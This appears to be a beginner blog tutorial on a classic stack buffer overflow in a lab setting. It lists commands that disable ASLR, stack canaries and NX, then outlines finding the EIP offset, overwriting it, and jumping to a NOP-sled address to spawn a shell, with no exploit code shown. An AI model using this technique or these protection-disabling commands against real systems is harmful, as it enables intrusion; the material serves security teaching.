How To Do a Basic Buffer Overflow Attack

Stack based buffer overflow

before we do the buffer overflow we need to disable all the stack protecters in the in OS such as ASLR canary stack & NX for disable ASLR we need to run the command echo 0 | sudo tee /proc/sys/kernel/randomize_va_space when we compileing the we need to run the command gcc vuln.c -o vuln -fno-stack-protector -z execstack -no-pie -m32 these 2 command will disable all the stack stack-protector

simple buffer overflow code

this is a simple program which in vulnarable to buffer overflow inhere we are taking an argument from the main and pass it to the vuln function in the program. in the vulnarable function there is a function call strcpy() in this method we can write more data than buffer provide us.

Overflowing the buffer

So when we overflow the program with some input it gives us a segmentation fault in the program which mean buffer is overflowed.

now lets try to find out how many characters we need to overflow the buffer
to do that I am going to use a offset pattern generated by a website.
click here to find it.

So now in here I wrote a little python code to print those offset patterns

Now i am going to run the program using GDB to get an idea about how memory registers are working.

r $(cat exploit) mean inputting the given exploit output.

now you can see that there is an segmentation fault in the code and we can clearly see that EIP value is replace by 0x6a413969 value now lets find out what is the character

lets write some exploits

now we wanna make sure that we will be able to get BBBB in to EIP register

we can get the BBBB in the EIP so now replace it with a real memory address which will help us to land a shell

in here we put a break point at in vuln_func() then we get the address which is lead to no oparation memeory and here we selected address 0xffffcd70 and replace it to BBBB and when we run the code in gdb we will be able to get an shell

see you in another blog!!!